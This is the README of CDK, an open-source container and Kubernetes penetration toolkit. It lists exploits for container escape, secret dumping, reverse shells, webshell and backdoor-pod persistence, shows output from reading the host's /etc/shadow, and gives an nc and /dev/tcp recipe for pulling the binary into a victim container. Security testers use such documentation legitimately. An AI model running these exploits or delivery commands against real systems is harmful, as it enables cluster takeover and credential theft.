English | 简体中文
Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.
CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.
Run cdk eva to get evaluate info and a recommend exploit, then run cdk run to start the attack.
> ./cdk eva --full
[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.
> ./cdk run cap-dac-read-search
Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
Download latest release in https://github.com/cdk-team/CDK/releases/
Drop executable files into the target container and start testing.
If you have an exploit that can upload a file, then you can upload CDK binary directly.
If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:
- First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
- Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk <tool> [<args>...]
Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.
Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki
Auto Escape:
cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>.
Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri> <data> Make request to K8s api-server.
ectl <endpoint> get <key> Unauthorized enumeration of ectd keys.
ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket.
probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000
Options:
-h --help Show this help msg.
-v --version Show version.
CDK has three modules:
- Evaluate: gather information inside container to find potential weakness.
- Exploit: for container escaping, persistance and lateral movement
- Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.
Usage
cdk evaluate [--full]
This command will run the scripts below without local file scanning, using --full to enable all.
| Tactics | Script | Supported | Usage/Example |
|---|---|---|---|
| Information Gathering | OS Basic Info | ✔ | link |
| Information Gathering | Available Capabilities | ✔ | link |
| Information Gathering | Available Linux Commands | ✔ | link |
| Information Gathering | Mounts | ✔ | link |
| Information Gathering | Net Namespace | ✔ | link |
| Information Gathering | Sensitive ENV | ✔ | link |
| Information Gathering | Sensitive Process | ✔ | link |
| Information Gathering | Sensitive Local Files | ✔ | link |
| Information Gathering | Kube-proxy Route Localnet(CVE-2020-8558) | ✔ | link |
| Information Gathering | DNS-Based Service Discovery | ✔ | link |
| Discovery | K8s Api-server Info | ✔ | link |
| Discovery | K8s Service-account Info | ✔ | link |
| Discovery | Cloud Provider Metadata API | ✔ | link |
List all available exploits:
cdk run --list
Run targeted exploit:
cdk run <script-name> [options]
| Tactic | Technique | CDK Exploit Name | Supported | In Thin | Doc |
|---|---|---|---|---|---|
| Escaping | docker-runc CVE-2019-5736 | runc-pwn | ✔ | ✔ | |
| Escaping | containerd-shim CVE-2020-15257 | shim-pwn | ✔ | link | |
| Escaping | docker.sock PoC (DIND attack) | docker-sock-check | ✔ | ✔ | link |
| Escaping | docker.sock RCE | docker-sock-pwn | ✔ | ✔ | link |
| Escaping | Docker API(2375) RCE | docker-api-pwn | ✔ | ✔ | link |
| Escaping | Device Mount Escaping | mount-disk | ✔ | ✔ | link |
| Escaping | LXCFS Escaping | lxcfs-rw | ✔ | ✔ | link |
| Escaping | Cgroups Escaping | mount-cgroup | ✔ | ✔ | link |
| Escaping | Abuse Unprivileged User Namespace Escaping CVE-2022-0492 | abuse-unpriv-userns | ✔ | ✔ | link |
| Escaping | Procfs Escaping | mount-procfs | ✔ | ✔ | link |
| Escaping | Ptrace Escaping PoC | check-ptrace | ✔ | ✔ | link |
| Escaping | Rewrite Cgroup(devices.allow) | rewrite-cgroup-devices | ✔ | ✔ | link |
| Escaping | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search | ✔ | ✔ | link |
| Discovery | K8s Component Probe | service-probe | ✔ | ✔ | link |
| Discovery | Dump Istio Sidecar Meta | istio-check | ✔ | ✔ | link |
| Discovery | Dump K8s Pod Security Policies | k8s-psp-dump | ✔ | link | |
| Remote Control | Reverse Shell | reverse-shell | ✔ | ✔ | link |
| Remote Control | Kubelet Exec | kubelet-exec | ✔ | ✔ | |
| Credential Access | Registry BruteForce | registry-brute | ✔ | ✔ | link |
| Credential Access | Access Key Scanning | ak-leakage | ✔ | ✔ | link |
| Credential Access | Etcd Get K8s Token | etcd-get-k8s-token | ✔ | ✔ | |
| Credential Access | Dump K8s Secrets | k8s-secret-dump | ✔ | ✔ | link |
| Credential Access | Dump K8s Config | k8s-configmap-dump | ✔ | ✔ | link |
| Privilege Escalation | K8s RBAC Bypass | k8s-get-sa-token | ✔ | ✔ | link |
| Persistence | Deploy WebShell | webshell-deploy | ✔ | ✔ | link |
| Persistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | ✔ | ✔ | link |
| Persistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | ✔ | link | |
| Persistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | ✔ | ✔ | link |
| Persistence | Deploy K8s CronJob | k8s-cronjob | ✔ | ✔ | link |
Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.
Running commands like in Linux, little different in input-args, see the usage link.
cdk nc [options]
cdk ps
| Command | Description | Supported | Usage/Example |
|---|---|---|---|
| nc | TCP Tunnel | ✔ | link |
| ps | Process Information | ✔ | link |
| ifconfig | Network Information | ✔ | link |
| vi | Edit Files | ✔ | link |
| ectl | Unauthorized enumeration of ectd keys | ✔ | |
| kcurl | Request to K8s api-server | ✔ | link |
| dcurl | Request to Docker HTTP API | ✔ | link |
| ucurl | Request to Docker Unix Socket | ✔ | link |
| rcurl | Request to Docker Registry API | ||
| probe | IP/Port Scanning | ✔ | link |
- 2022-11-11 发布演示视频404星链计划开源安全工具演示——CDK
- 2021-11-11 发布文章《CDK:一款针对容器场景的多功能渗透工具》
更新
- 为 docker rootfs 适配 docker devicemapper 文件系统
- 增加查看网络连接信息
- 修复 k8s apiserver 中超时问题
- 添加netstat文档
- 修复 cgroup 后半部分切片长度错误
更新
- 支持 linux 环境下的不同容器运行时,如 containerd、runc、docker
- 修复shadow-apiserver匿名访问无效的issue,支持新版本的k8s,如 v1.23.1
- 添加迭代部分功能的消息提醒
更新
- 检查内核漏洞利用,使用 mzet-/linux-exploit-suggester
- 支持检查路径中的 setuid 文件
- 为功能列表添加增加红色高亮输出
- 支持两种新的格式化打印函数
- 优化 CDK banner 高亮输出
更新
- 新增通过 cgroup release_agent 实现的 lxcfs-rw Exploit
- 为 lxcfs-rw/lxcfs-rw-cgroup 添加推荐信息
- 新增高亮显示所有的挂载信息
Exploits
- 为 ParseCDKMain 添加单元测试
- 新增'Exploit container escape with kubelet log access & /var/log mount'
- 新增 kubelet 默认未授权访问利用(端口10250)
Others
- 在 github action 中新增了 go test
- 支持 linux 容器获取网关
- 更新文档,新增了 快速开始 章节
- 新增在 pods 中获取网关